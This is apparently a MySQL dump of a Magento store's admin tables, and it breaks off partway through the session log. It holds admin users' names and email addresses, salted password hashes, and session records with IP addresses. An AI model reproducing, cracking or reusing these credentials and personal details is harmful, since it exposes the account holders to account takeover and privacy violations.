--
-- Host: localhost    Database: swatinew
-- ------------------------------------------------------


--
-- Table structure for table `admin_adobe_ims_webapi`
--

CREATE TABLE `admin_adobe_ims_webapi` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'Entity ID',
  `admin_user_id` int(10) unsigned NOT NULL DEFAULT 0 COMMENT 'Admin User Id',
  `access_token_hash` varchar(255) DEFAULT NULL COMMENT 'Access Token Hash',
  `access_token` text DEFAULT NULL COMMENT 'Access Token',
  `created_at` timestamp NOT NULL DEFAULT current_timestamp() COMMENT 'Created At',
  `updated_at` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp() COMMENT 'Updated At',
  `last_check_time` timestamp NOT NULL DEFAULT '0000-00-00 00:00:00' COMMENT 'Last check time',
  `access_token_expires_at` timestamp NOT NULL DEFAULT '0000-00-00 00:00:00' COMMENT 'Access Token Expires At',
  PRIMARY KEY (`id`),
  UNIQUE KEY `ADMIN_ADOBE_IMS_WEBAPI_ACCESS_TOKEN_HASH` (`access_token_hash`),
  KEY `ADMIN_ADOBE_IMS_WEBAPI_ADMIN_USER_ID` (`admin_user_id`),
  CONSTRAINT `ADMIN_ADOBE_IMS_WEBAPI_ADMIN_USER_ID_ADMIN_USER_USER_ID` FOREIGN KEY (`admin_user_id`) REFERENCES `admin_user` (`user_id`) ON DELETE CASCADE
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci COMMENT='Admin Adobe IMS Webapi';

--
-- Dumping data for table `admin_adobe_ims_webapi`
--


--
-- Table structure for table `admin_analytics_usage_version_log`
--

CREATE TABLE `admin_analytics_usage_version_log` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'Log ID',
  `last_viewed_in_version` varchar(50) NOT NULL COMMENT 'Viewer last viewed on product version',
  PRIMARY KEY (`id`),
  UNIQUE KEY `ADMIN_ANALYTICS_USAGE_VERSION_LOG_LAST_VIEWED_IN_VERSION` (`last_viewed_in_version`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci COMMENT='Admin Notification Viewer Log Table';

--
-- Dumping data for table `admin_analytics_usage_version_log`
--

INSERT INTO `admin_analytics_usage_version_log` VALUES (1,'2.4.6');

--
-- Table structure for table `admin_passwords`
--

CREATE TABLE `admin_passwords` (
  `password_id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'Password ID',
  `user_id` int(10) unsigned NOT NULL DEFAULT 0 COMMENT 'User ID',
  `password_hash` varchar(255) DEFAULT NULL COMMENT 'Password Hash',
  `expires` int(10) unsigned NOT NULL DEFAULT 0 COMMENT 'Deprecated',
  `last_updated` int(10) unsigned NOT NULL DEFAULT 0 COMMENT 'Last Updated',
  PRIMARY KEY (`password_id`),
  KEY `ADMIN_PASSWORDS_USER_ID` (`user_id`),
  CONSTRAINT `ADMIN_PASSWORDS_USER_ID_ADMIN_USER_USER_ID` FOREIGN KEY (`user_id`) REFERENCES `admin_user` (`user_id`) ON DELETE CASCADE
) ENGINE=InnoDB AUTO_INCREMENT=8 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci COMMENT='Admin Passwords';

--
-- Dumping data for table `admin_passwords`
--

INSERT INTO `admin_passwords` VALUES (1,1,'62fa78a09a5b62827b1d7900f60c5798616d721cb5c9491b0286d7b275aa1d89:Sqyt5FqqaKEqRKVlwNdIvs5Y3xME6NEQ:1',0,1578572179),(2,2,'d40da37e3805cbbcf890b4cc71ec7e356ba3c81417091bc996797ecf039ee49d:4zDpkrCy8PJKTiptZEbOaYklpsOtVt8b:1',0,1581943421),(3,1,'6725d599c87d341e09e22f08edf39ed4bd472603991945da877778c04fbc242f:jfwBKHweWvTHbrRlOukf1N3iVhuBNSY7:1',0,1586361191),(4,1,'019ecf8d7035e2beba7312702f439fe059def08df0e920165e060bdca6613b0a:oWabfApiNt9Vb1iDkwMEIPltoxuHhoIV:1',0,1594269054),(5,1,'e5b335ba4d0d64b3168637f29b36df69f4c63b4cf6d54efc4c78e948c5f5ccd6:KrIZPgiDneMrKuyX4jIL3466p0gbLUUU:1',0,1609829903),(6,1,'6fb6826357993cc14df6c1252da7ad1c005b967c7a3fad2d6ff3868769a33fa8:hgtSU6r9BCPum28NYuw0KDr7EYpsg6CL:1',0,1649321092),(7,3,'c18006e54623553fbc9e386d29fb56f3b4220bbcd08c4e74476fe0b9997e2396:x9WbUV8AAtLpzKSaHECDlMycY4Kvn3Kg:3_32_2_67108864',0,1705250310);

--
-- Table structure for table `admin_system_messages`
--

CREATE TABLE `admin_system_messages` (
  `identity` varchar(100) NOT NULL COMMENT 'Message ID',
  `severity` smallint(5) unsigned NOT NULL DEFAULT 0 COMMENT 'Problem type',
  `created_at` timestamp NOT NULL DEFAULT current_timestamp() COMMENT 'Create date',
  PRIMARY KEY (`identity`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci COMMENT='Admin System Messages';

--
-- Dumping data for table `admin_system_messages`
--

INSERT INTO `admin_system_messages` VALUES ('c79237a69f9c7b43241a29075febea12',1,'2024-01-14 16:51:59'),('da332d712f3215b9b94bfa268c398323',2,'2024-01-14 16:51:14');

--
-- Table structure for table `admin_user`
--

CREATE TABLE `admin_user` (
  `user_id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'User ID',
  `firstname` varchar(32) DEFAULT NULL COMMENT 'User First Name',
  `lastname` varchar(32) DEFAULT NULL COMMENT 'User Last Name',
  `email` varchar(128) DEFAULT NULL COMMENT 'User Email',
  `username` varchar(40) DEFAULT NULL COMMENT 'User Login',
  `password` varchar(255) NOT NULL COMMENT 'User Password',
  `created` timestamp NOT NULL DEFAULT current_timestamp() COMMENT 'User Created Time',
  `modified` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp() COMMENT 'User Modified Time',
  `logdate` timestamp NULL DEFAULT NULL COMMENT 'User Last Login Time',
  `lognum` smallint(5) unsigned NOT NULL DEFAULT 0 COMMENT 'User Login Number',
  `reload_acl_flag` smallint(6) NOT NULL DEFAULT 0 COMMENT 'Reload ACL',
  `is_active` smallint(6) NOT NULL DEFAULT 1 COMMENT 'User Is Active',
  `extra` text DEFAULT NULL COMMENT 'User Extra Data',
  `rp_token` text DEFAULT NULL COMMENT 'Reset Password Link Token',
  `rp_token_created_at` timestamp NULL DEFAULT NULL COMMENT 'Reset Password Link Token Creation Date',
  `interface_locale` varchar(16) NOT NULL DEFAULT 'en_US' COMMENT 'Backend interface locale',
  `failures_num` smallint(6) DEFAULT 0 COMMENT 'Failure Number',
  `first_failure` timestamp NULL DEFAULT NULL COMMENT 'First Failure',
  `lock_expires` timestamp NULL DEFAULT NULL COMMENT 'Expiration Lock Dates',
  `refresh_token` text DEFAULT NULL COMMENT 'Email connector refresh token',
  PRIMARY KEY (`user_id`),
  UNIQUE KEY `ADMIN_USER_USERNAME` (`username`)
) ENGINE=InnoDB AUTO_INCREMENT=4 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci COMMENT='Admin User Table';

--
-- Dumping data for table `admin_user`
--

INSERT INTO `admin_user` VALUES (1,'admin','admin','pankajjha0191@gmail.com','admin','6fb6826357993cc14df6c1252da7ad1c005b967c7a3fad2d6ff3868769a33fa8:hgtSU6r9BCPum28NYuw0KDr7EYpsg6CL:1','2020-01-09 12:16:19','2022-04-29 18:00:07','2022-04-29 18:00:07',282,0,1,'{\"configState\":{\"plazathemes_design_general\":\"1\",\"plazathemes_design_header\":\"1\",\"plazathemes_design_footer_top\":\"1\",\"plazathemes_design_footer_bottom\":\"1\",\"mfblog_general\":\"0\",\"mfblog_index_page\":\"0\",\"mfblog_post_view\":\"0\",\"mfblog_post_list\":\"0\",\"mfblog_rss_feed\":\"0\",\"mfblog_sidebar\":\"1\",\"general_single_store_mode\":\"1\",\"brandslider_general\":\"1\",\"saleproductslider_new_status\":\"1\",\"quickview_general\":\"1\",\"catalog_fields_masks\":\"1\",\"catalog_recently_products\":\"1\",\"catalog_frontend\":\"1\",\"catalog_review\":\"1\",\"catalog_productalert\":\"0\",\"catalog_productalert_cron\":\"0\",\"catalog_placeholder\":\"0\",\"catalog_product_video\":\"0\",\"catalog_price\":\"1\",\"catalog_layered_navigation\":\"0\",\"catalog_seo\":\"0\",\"catalog_navigation\":\"0\",\"catalog_search\":\"0\",\"catalog_downloadable\":\"0\",\"catalog_custom_options\":\"0\",\"currency_options\":\"1\",\"currency_fixerio\":\"0\",\"currency_import\":\"0\",\"dev_front_end_development_workflow\":\"1\",\"dev_restrict\":\"0\",\"dev_debug\":\"1\",\"dev_template\":\"1\",\"dev_translate_inline\":\"1\",\"admin_security\":\"1\",\"admin_emails\":\"0\",\"admin_startup\":\"0\",\"admin_url\":\"0\",\"admin_dashboard\":\"1\",\"admin_captcha\":\"1\",\"cataloginventory_options\":\"1\",\"cataloginventory_item_options\":\"1\",\"customer_account_share\":\"1\",\"customer_online_customers\":\"1\",\"customer_create_account\":\"1\",\"customer_password\":\"1\",\"customer_account_information\":\"1\",\"customer_startup\":\"1\",\"customer_address_templates\":\"1\",\"customer_captcha\":\"1\",\"customer_address\":\"0\",\"web_unsecure\":\"1\",\"web_url\":\"0\",\"web_seo\":\"0\",\"web_secure\":\"1\",\"web_default\":\"0\",\"web_cookie\":\"0\",\"web_session\":\"0\",\"web_browser_capabilities\":\"0\",\"payment_us_cashondelivery\":\"0\",\"payment_us_banktransfer\":\"0\",\"payment_us_recommended_solutions\":\"0\",\"payment_us_razorpay\":\"1\",\"payment_us_account\":\"1\",\"payment_us_other_paypal_payment_solutions\":\"0\",\"payment_us_paypal_group_all_in_one\":\"1\",\"payment_us_paypal_payment_gateways\":\"1\",\"payment_us_other_payment_methods\":\"1\",\"payment_us_klarna_section\":\"0\",\"payment_us_amazon_payment\":\"0\",\"payment_us_free\":\"0\",\"payment_us_checkmo\":\"0\",\"payment_us_purchaseorder\":\"0\",\"payment_us_authorizenet_acceptjs\":\"0\",\"payment_us_authorizenet_directpost\":\"0\",\"carriers_flatrate\":\"0\",\"carriers_freeshipping\":\"1\",\"carriers_tablerate\":\"0\",\"carriers_temando\":\"0\",\"carriers_ups\":\"0\",\"carriers_usps\":\"0\",\"carriers_fedex\":\"0\",\"carriers_dhl\":\"0\",\"dev_js\":\"0\",\"dev_css\":\"1\",\"lofformbuilder_general_settings\":\"1\",\"lofformbuilder_email_settings\":\"1\",\"lofformbuilder_field_templates\":\"1\",\"lofformbuilder_googleapi\":\"1\",\"dev_image\":\"1\",\"dev_static\":\"1\",\"dev_grid\":\"1\",\"general_country\":\"1\",\"general_region\":\"0\",\"general_locale\":\"1\",\"general_store_information\":\"1\",\"trans_email_ident_general\":\"1\",\"system_full_page_cache\":\"0\",\"system_backup\":\"0\",\"system_smtp\":\"0\",\"system_cron\":\"0\",\"system_currency\":\"0\",\"system_upload_configuration\":\"0\",\"system_adminnotification\":\"0\",\"cms_wysiwyg\":\"1\",\"trans_email_ident_sales\":\"1\",\"trans_email_ident_support\":\"1\",\"trans_email_ident_custom1\":\"1\",\"trans_email_ident_custom2\":\"1\",\"msp_securitysuite_recaptcha_general\":\"1\",\"msp_securitysuite_recaptcha_backend\":\"1\",\"msp_securitysuite_recaptcha_frontend\":\"1\",\"tax_classes\":\"1\",\"tax_calculation\":\"1\",\"tax_defaults\":\"1\",\"tax_vertex_settings\":\"0\",\"tax_vertex_seller_info\":\"0\",\"tax_avaiable_shipping_product_codes\":\"0\",\"tax_display\":\"0\",\"tax_cart_display\":\"1\",\"tax_sales_display\":\"1\",\"tax_weee\":\"1\",\"contact_contact\":\"1\",\"contact_email\":\"1\",\"lofall_general\":\"1\",\"lofgallery_general_settings\":\"1\",\"lofgallery_latest_page\":\"1\",\"lofgallery_banner_detail\":\"1\",\"lofgallery_in_product\":\"1\",\"lofajaxscroll_general\":\"1\",\"lofajaxscroll_instances\":\"1\",\"lofajaxscroll_selectors\":\"1\",\"lofajaxscroll_design\":\"1\",\"layered_navigation_module\":\"1\",\"layered_navigation_general\":\"1\",\"ajaxlayerednavigation_general\":\"1\",\"mageplaza_general\":\"0\"}}',NULL,NULL,'en_US',0,NULL,NULL,NULL),(2,'Sales','SM','sales@swatimishra.com','sales','d40da37e3805cbbcf890b4cc71ec7e356ba3c81417091bc996797ecf039ee49d:4zDpkrCy8PJKTiptZEbOaYklpsOtVt8b:1','2020-02-17 12:43:41','2020-02-17 12:44:28','2020-02-17 12:44:28',1,0,1,'null',NULL,NULL,'en_US',0,NULL,NULL,NULL),(3,'Pankaj','Jha','impunkj@gmail.com','pankajjha','c18006e54623553fbc9e386d29fb56f3b4220bbcd08c4e74476fe0b9997e2396:x9WbUV8AAtLpzKSaHECDlMycY4Kvn3Kg:3_32_2_67108864','2024-01-14 16:38:30','2024-01-14 16:48:05','2024-01-14 16:48:05',1,0,1,NULL,NULL,NULL,'en_US',0,NULL,NULL,NULL);

--
-- Table structure for table `admin_user_expiration`
--

CREATE TABLE `admin_user_expiration` (
  `user_id` int(10) unsigned NOT NULL COMMENT 'User ID',
  `expires_at` datetime NOT NULL DEFAULT '0000-00-00 00:00:00' COMMENT 'User Expiration Date',
  PRIMARY KEY (`user_id`),
  CONSTRAINT `ADMIN_USER_EXPIRATION_USER_ID_ADMIN_USER_USER_ID` FOREIGN KEY (`user_id`) REFERENCES `admin_user` (`user_id`) ON DELETE CASCADE
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci COMMENT='Admin User expiration dates table';

--
-- Dumping data for table `admin_user_expiration`
--


--
-- Table structure for table `admin_user_session`
--

CREATE TABLE `admin_user_session` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'Entity ID',
  `session_id` varchar(1) DEFAULT NULL COMMENT 'Deprecated: Session ID value no longer used',
  `user_id` int(10) unsigned DEFAULT NULL COMMENT 'Admin User ID',
  `status` smallint(5) unsigned NOT NULL DEFAULT 1 COMMENT 'Current Session status',
  `created_at` timestamp NOT NULL DEFAULT current_timestamp() COMMENT 'Created Time',
  `updated_at` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp() COMMENT 'Update Time',
  `ip` varchar(15) NOT NULL COMMENT 'Remote user IP',
  PRIMARY KEY (`id`),
  KEY `ADMIN_USER_SESSION_SESSION_ID` (`session_id`),
  KEY `ADMIN_USER_SESSION_USER_ID` (`user_id`),
  CONSTRAINT `ADMIN_USER_SESSION_USER_ID_ADMIN_USER_USER_ID` FOREIGN KEY (`user_id`) REFERENCES `admin_user` (`user_id`) ON DELETE CASCADE
) ENGINE=InnoDB AUTO_INCREMENT=286 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci COMMENT='Admin User sessions table';

--
-- Dumping data for table `admin_user_session`
--

INSERT INTO `admin_user_session` VALUES (1,NULL,1,1,'2020-01-09 16:21:16','2024-01-14 15:44:34','103.224.146.159'),(2,NULL,1,1,'2020-01-09 16:57:09','2024-01-14 15:44:34','103.224.146.159'),(3,NULL,1,1,'2020-01-09 17:37:14','2024-01-14 15:44:34','103.224.146.159'),(4,NULL,1,1,'2020-01-11 13:30:24','2024-01-14 15:44:34','103.224.146.159'),(5,NULL,1,1,'2020-01-11 14:45:24','2024-01-14 15:44:34','103.224.146.51'),(6,NULL,1,1,'2020-01-11 15:27:51','2024-01-14 15:44:34','103.224.146.51'),(7,NULL,1,1,'2020-01-11 17:57:23','2024-01-14 15:44:34','103.224.146.159'),(8,NULL,1,1,'2020-01-12 06:40:08','2024-01-14 15:44:34','103.224.146.159'),(9,NULL,1,1,'2020-01-12 09:20:53','2024-01-14 15:44:34','103.224.146.159'),(10,NULL,1,1,'2020-01-18 06:47:03','2024-01-14 15:44:34','103.224.146.159'),(11,NULL,1,1,'2020-01-18 08:04:20','2024-01-14 15:44:34','103.224.146.159'),(12,NULL,1,1,'2020-01-18 10:46:39','2024-01-14 15:44:34','103.224.146.159'),(13,NULL,1,1,'2020-01-18 12:28:25','2024-01-14 15:44:34','103.224.146.159'),(14,NULL,1,1,'2020-01-18 15:41:24','2024-01-14 15:44:34','103.224.146.159'),(15,NULL,1,1,'2020-01-18 16:11:12','2024-01-14 15:44:34','103.224.146.159'),(16,NULL,1,1,'2020-01-19 04:48:15','2024-01-14 15:44:34','103.224.146.159'),(17,NULL,1,1,'2020-01-19 05:11:07','2024-01-14 15:44:34','103.224.146.159'),(18,NULL,1,1,'2020-01-19 06:05:39','2024-01-14 15:44:34','103.224.146.159'),(19,NULL,1,1,'2020-01-19 09:05:15','2024-01-14 15:44:34','103.224.146.159'),(20,NULL,1,1,'2020-01-19 14:15:01','2024-01-14 15:44:34','103.224.146.159'),(21,NULL,1,1,'2020-01-19 15:34:29','2024-01-14 15:44:34','103.224.146.159'),(22,NULL,1,1,'2020-01-20 10:13:15','2024-01-14 15:44:34','103.224.146.51'),(23,NULL,1,1,'2020-01-20 11:00:35','2024-01-14 15:44:34','103.224.146.159'),(24,NULL,1,1,'2020-01-20 11:58:19','2024-01-14 15:44:34','103.224.146.159'),(25,NULL,1,1,'2020-01-22 13:09:23','2024-01-14 15:44:34','103.224.146.159'),(26,NULL,1,1,'2020-01-29 15:23:48','2024-01-14 15:44:34','103.224.146.159'),(27,NULL,1,2,'2020-01-29 15:55:01','2024-01-14 15:44:34','103.61.253.191'),(28,NULL,1,1,'2020-01-29 15:55:41','2024-01-14 15:44:34','103.224.146.51'),(29,NULL,1,1,'2020-01-29 16:47:38','2024-01-14 15:44:34','103.224.146.51'),(30,NULL,1,1,'2020-01-30 16:38:37','2024-01-14 15:44:34','103.61.253.224'),(31,NULL,1,1,'2020-01-30 17:27:04','2024-01-14 15:44:34','103.224.146.159'),(32,NULL,1,1,'2020-01-31 16:11:50','2024-01-14 15:44:34','103.61.253.182'),(33,NULL,1,1,'2020-01-31 16:29:08','2024-01-14 15:44:34','103.61.253.182'),(34,NULL,1,1,'2020-02-01 07:24:54','2024-01-14 15:44:34','103.224.146.159'),(35,NULL,1,1,'2020-02-02 16:49:44','2024-01-14 15:44:34','103.224.146.159'),(36,NULL,1,1,'2020-02-06 15:06:26','2024-01-14 15:44:34','103.224.146.159'),(37,NULL,1,1,'2020-02-06 15:34:03','2024-01-14 15:44:34','103.224.146.159'),(38,NULL,1,1,'2020-02-07 14:01:11','2024-01-14 15:44:34','182.69.184.163'),(39,NULL,1,1,'2020-02-11 15:49:33','2024-01-14 15:44:34','103.224.146.159'),(40,NULL,1,2,'2020-02-13 09:00:45','2024-01-14 15:44:34','122.160.59.127'),(41,NULL,1,1,'2020-02-13 09:01:38','2024-01-14 15:44:34','182.69.184.163'),(42,NULL,NULL,0,'2020-02-13 09:47:29','2024-01-14 15:44:34',''),(43,NULL,1,1,'2020-02-13 17:00:36','2024-01-14 15:44:34','103.224.146.159'),(44,NULL,1,0,'2020-02-14 13:53:24','2024-01-14 15:44:34','182.69.184.163'),(45,NULL,1,2,'2020-02-15 14:02:46','2024-01-14 15:44:34','103.224.146.159'),(46,NULL,1,2,'2020-02-15 14:10:52','2024-01-14 15:44:34','103.61.253.160'),(47,NULL,1,1,'2020-02-15 14:12:28','2024-01-14 15:44:34','103.224.146.159'),(48,NULL,1,1,'2020-02-15 14:16:41','2024-01-14 15:44:34','103.61.253.160'),(49,NULL,1,1,'2020-02-15 14:55:11','2024-01-14 15:44:34','103.224.146.159'),(50,NULL,1,1,'2020-02-15 15:14:38','2024-01-14 15:44:34','103.61.253.160'),(51,NULL,1,1,'2020-02-15 16:10:05','2024-01-14 15:44:34','103.61.253.152'),(52,NULL,1,1,'2020-02-15 16:28:14','2024-01-14 15:44:34','103.224.146.159'),(53,NULL,1,1,'2020-02-15 17:14:15','2024-01-14 15:44:34','103.61.253.197'),(54,NULL,1,0,'2020-02-17 12:36:57','2024-01-14 15:44:34','122.160.59.127'),(55,NULL,2,1,'2020-02-17 12:44:28','2024-01-14 15:44:34','122.160.59.127'),(56,NULL,1,1,'2020-02-17 13:07:08','2024-01-14 15:44:34','122.160.59.127'),(57,NULL,1,1,'2020-02-17 16:48:48','2024-01-14 15:44:34','103.61.253.224'),(58,NULL,1,1,'2020-02-21 04:53:10','2024-01-14 15:44:34','103.224.146.159'),(59,NULL,1,1,'2020-02-21 05:54:15','2024-01-14 15:44:34','103.224.146.159'),(60,NULL,1,1,'2020-02-21 06:33:57','2024-01-14 15:44:34','103.224.146.159'),(61,NULL,1,1,'2020-02-21 07:10:04','2024-01-14 15:44:34','103.61.253.219'),(62,NULL,1,1,'2020-02-21 07:38:22','2024-01-14 15:44:34','103.224.146.159'),(63,NULL,1,1,'2020-02-21 08:13:33','2024-01-14 15:44:34','103.224.146.159'),(64,NULL,1,1,'2020-02-21 09:08:26','2024-01-14 15:44:34','103.224.146.159'),(65,NULL,1,1,'2020-02-21 10:07:31','2024-01-14 15:44:34','103.224.146.159'),(66,NULL,1,1,'2020-02-21 11:07:29','2024-01-14 15:44:34','103.224.146.159'),(67,NULL,1,1,'2020-02-26 16:53:35','2024-01-14 15:44:34','103.224.146.159'),(68,NULL,1,1,'2020-02-26 16:59:16','2024-01-14 15:44:34','103.61.253.250'),(69,NULL,1,1,'2020-02-26 17:11:52','2024-01-14 15:44:34','103.224.146.159'),(70,NULL,1,1,'2020-02-27 13:02:17','2024-01-14 15:44:34','182.77.52.164'),(71,NULL,1,1,'2020-02-29 06:55:52','2024-01-14 15:44:34','103.224.146.159'),(72,NULL,1,1,'2020-02-29 08:03:57','2024-01-14 15:44:34','103.224.146.159'),(73,NULL,1,1,'2020-02-29 09:38:05','2024-01-14 15:44:34','103.224.146.159'),(74,NULL,1,1,'2020-02-29 11:16:52','2024-01-14 15:44:34','103.61.253.132'),(75,NULL,1,1,'2020-02-29 13:05:33','2024-01-14 15:44:34','103.224.146.159'),(76,NULL,1,1,'2020-02-29 13:28:38','2024-01-14 15:44:34','103.224.146.159'),(77,NULL,1,1,'2020-02-29 15:17:17','2024-01-14 15:44:34','103.224.146.159'),(78,NULL,1,1,'2020-03-01 05:22:44','2024-01-14 15:44:34','103.224.146.159'),(79,NULL,1,1,'2020-03-06 12:42:18','2024-01-14 15:44:34','103.224.146.159'),(80,NULL,1,1,'2020-03-08 14:58:26','2024-01-14 15:44:34','103.224.146.159'),(81,NULL,1,1,'2020-03-08 15:47:20','2024-01-14 15:44:34','103.224.146.159'),(82,NULL,1,1,'2020-03-08 16:10:09','2024-01-14 15:44:34','103.224.146.159'),(83,NULL,1,1,'2020-03-14 08:23:04','2024-01-14 15:44:34','103.224.146.159'),(84,NULL,1,1,'2020-03-14 15:24:30','2024-01-14 15:44:34','103.224.146.159'),(85,NULL,1,1,'2020-03-15 05:30:41','2024-01-14 15:44:34','103.224.146.159'),(86,NULL,1,1,'2020-03-15 09:04:25','2024-01-14 15:44:34','103.224.146.159'),(87,NULL,1,1,'2020-03-15 09:26:18','2024-01-14 15:44:34','103.224.146.159'),(88,NULL,1,1,'2020-03-15 10:44:29','2024-01-14 15:44:34','103.224.146.159'),(89,NULL,1,1,'2020-03-15 11:33:48','2024-01-14 15:44:34','103.224.146.159'),(90,NULL,1,1,'2020-03-15 12:26:42','2024-01-14 15:44:34','103.224.146.159'),(91,NULL,1,1,'2020-03-16 15:19:29','2024-01-14 15:44:34','103.224.146.159'),(92,NULL,1,1,'2020-03-19 16:25:43','2024-01-14 15:44:34','103.224.146.159'),(93,NULL,1,1,'2020-03-20 05:08:33','2024-01-14 15:44:34','103.224.146.159'),(94,NULL,1,1,'2020-03-20 06:11:58','2024-01-14 15:44:34','103.224.146.159'),(95,NULL,1,1,'2020-03-23 04:27:49','2024-01-14 15:44:34','103.224.146.159'),(96,NULL,1,1,'2020-03-23 06:16:30','2024-01-14 15:44:34','103.224.146.159'),(97,NULL,1,1,'2020-03-23 06:40:15','2024-01-14 15:44:34','103.224.146.159'),(98,NULL,1,1,'2020-03-23 08:29:36','2024-01-14 15:44:34','103.224.146.159'),(99,NULL,1,1,'2020-03-23 09:21:41','2024-01-14 15:44:34','103.224.146.159'),(100,NULL,1,1,'2020-04-05 16:59:45','2024-01-14 15:44:34','103.224.146.159'),(101,NULL,1,1,'2020-04-08 15:51:50','2024-01-14 15:44:34','103.224.146.159'),(102,NULL,1,1,'2020-04-10 08:14:01','2024-01-14 15:44:34','103.224.146.159'),(103,NULL,1,1,'2020-04-10 08:36:06','2024-01-14 15:44:34','103.224.146.159'),(104,NULL,1,1,'2020-04-10 14:59:27','2024-01-14 15:44:34','103.224.146.159'),(105,NULL,1,1,'2020-04-10 15:39:34','2024-01-14 15:44:34','103.224.146.159'),(106,NULL,1,1,'2020-04-11 06:15:20','2024-01-14 15:44:34','103.224.146.159'),(107,NULL,1,1,'2020-04-11 06:55:02','2024-01-14 15:44:34','103.224.146.159'),(108,NULL,1,1,'2020-04-11 11:24:05','2024-01-14 15:44:34','103.224.146.159'),(109,NULL,1,1,'2020-04-11 11:45:06','2024-01-14 15:44:34','103.224.146.159'),(110,NULL,1,1,'2020-04-11 15:38:11','2024-01-14 15:44:34','103.224.146.159'),(111,NULL,1,1,'2020-04-12 05:50:32','2024-01-14 15:44:34','103.224.146.159'),(112,NULL,1,1,'2020-04-12 10:31:31','2024-01-14 15:44:34','103.224.146.159'),(113,NULL,1,1,'2020-04-12 12:00:43','2024-01-14 15:44:34','103.224.146.159'),(114,NULL,1,1,'2020-04-12 14:09:29','2024-01-14 15:44:34','103.224.146.159'),(115,NULL,1,1,'2020-04-18 13:54:47','2024-01-14 15:44:34','103.224.146.159'),(116,NULL,1,1,'2020-04-18 14:26:32','2024-01-14 15:44:34','103.224.146.159'),(117,NULL,1,1,'2020-04-18 17:09:33','2024-01-14 15:44:34','103.224.146.159'),(118,NULL,1,1,'2020-04-18 17:32:05','2024-01-14 15:44:34','103.224.146.159'),(119,NULL,1,1,'2020-04-19 15:34:37','2024-01-14 15:44:34','103.224.146.159'),(120,NULL,1,1,'2020-04-20 09:37:53','2024-01-14 15:44:34','103.224.146.159'),(121,NULL,1,1,'2020-04-20 10:50:48','2024-01-14 15:44:34','103.224.146.159'),(122,NULL,1,1,'2020-04-26 13:28:21','2024-01-14 15:44:34','103.100.7.130'),(123,NULL,1,1,'2020-04-26 15:01:44','2024-01-14 15:44:34','103.100.7.130'),(124,NULL,1,1,'2020-04-26 16:03:19','2024-01-14 15:44:34','103.100.7.130'),(125,NULL,1,1,'2020-04-27 15:01:15','2024-01-14 15:44:34','103.100.7.130'),(126,NULL,1,1,'2020-05-05 07:57:11','2024-01-14 15:44:34','103.100.7.130'),(127,NULL,1,1,'2020-05-12 13:19:43','2024-01-14 15:44:34','49.36.140.62'),(128,NULL,1,1,'2020-05-12 13:19:49','2024-01-14 15:44:34','103.97.210.214'),(129,NULL,1,1,'2020-05-12 13:20:30','2024-01-14 15:44:34','49.36.140.62'),(130,NULL,1,1,'2020-05-19 12:32:48','2024-01-14 15:44:34','103.100.7.155'),(131,NULL,1,1,'2020-05-21 06:17:41','2024-01-14 15:44:34','103.97.210.214'),(132,NULL,1,1,'2020-05-21 06:56:37','2024-01-14 15:44:34','103.97.210.214'),(133,NULL,1,1,'2020-05-22 12:14:28','2024-01-14 15:44:34','103.97.210.195'),(134,NULL,1,1,'2020-05-22 13:07:41','2024-01-14 15:44:34','103.100.7.155'),(135,NULL,1,1,'2020-05-22 13:13:28','2024-01-14 15:44:34','103.97.210.195'),(136,NULL,1,1,'2020-05-23 04:17:58','2024-01-14 15:44:34','103.97.210.195'),(137,NULL,1,1,'2020-05-23 12:01:36','2024-01-14 15:44:34','103.100.7.155'),(138,NULL,1,1,'2020-05-23 12:59:35','2024-01-14 15:44:34','103.97.210.195'),(139,NULL,1,1,'2020-05-23 13:21:45','2024-01-14 15:44:34','103.121.114.148'),(140,NULL,1,1,'2020-05-25 10:31:28','2024-01-14 15:44:34','103.97.210.170'),(141,NULL,1,1,'2020-05-25 11:20:42','2024-01-14 15:44:34','103.97.210.170'),(142,NULL,1,1,'2020-05-26 07:53:40','2024-01-14 15:44:34','103.97.210.170'),(143,NULL,1,1,'2020-05-26 15:41:11','2024-01-14 15:44:34','103.100.7.155'),(144,NULL,1,1,'2020-05-26 16:07:13','2024-01-14 15:44:34','103.100.7.155'),(145,NULL,1,1,'2020-05-27 12:32:31','2024-01-14 15:44:34','103.100.7.155'),(146,NULL,1,1,'2020-05-27 13:52:16','2024-01-14 15:44:34','103.100.7.155'),(147,NULL,1,1,'2020-05-27 19:39:31','2024-01-14 15:44:34','103.97.210.170'),(148,NULL,1,1,'2020-05-29 18:54:00','2024-01-14 15:44:34','103.97.210.241'),(149,NULL,1,1,'2020-05-30 19:19:59','2024-01-14 15:44:34','103.97.210.241'),(150,NULL,1,1,'2020-05-30 20:12:52','2024-01-14 15:44:34','103.97.210.241'),(151,NULL,1,1,'2020-05-31 13:07:49','2024-01-14 15:44:34','103.100.7.155'),(152,NULL,1,1,'2020-06-04 07:11:53','2024-01-14 15:44:34','103.97.210.211'),(153,NULL,1,1,'2020-06-04 12:58:47','2024-01-14 15:44:34','103.100.7.155'),(154,NULL,1,1,'2020-06-04 13:15:16','2024-01-14 15:44:34','103.97.210.211'),(155,NULL,1,1,'2020-06-05 04:22:35','2024-01-14 15:44:34','103.100.7.155'),(156,NULL,1,1,'2020-06-05 05:42:46','2024-01-14 15:44:34','103.97.210.211'),(157,NULL,1,1,'2020-06-05 10:28:03','2024-01-14 15:44:34','103.97.210.211'),(158,NULL,1,1,'2020-06-05 10:33:21','2024-01-14 15:44:34','103.100.7.155'),(159,NULL,1,1,'2020-06-07 09:47:33','2024-01-14 15:44:34','103.100.7.155'),(160,NULL,1,1,'2020-06-07 11:11:33','2024-01-14 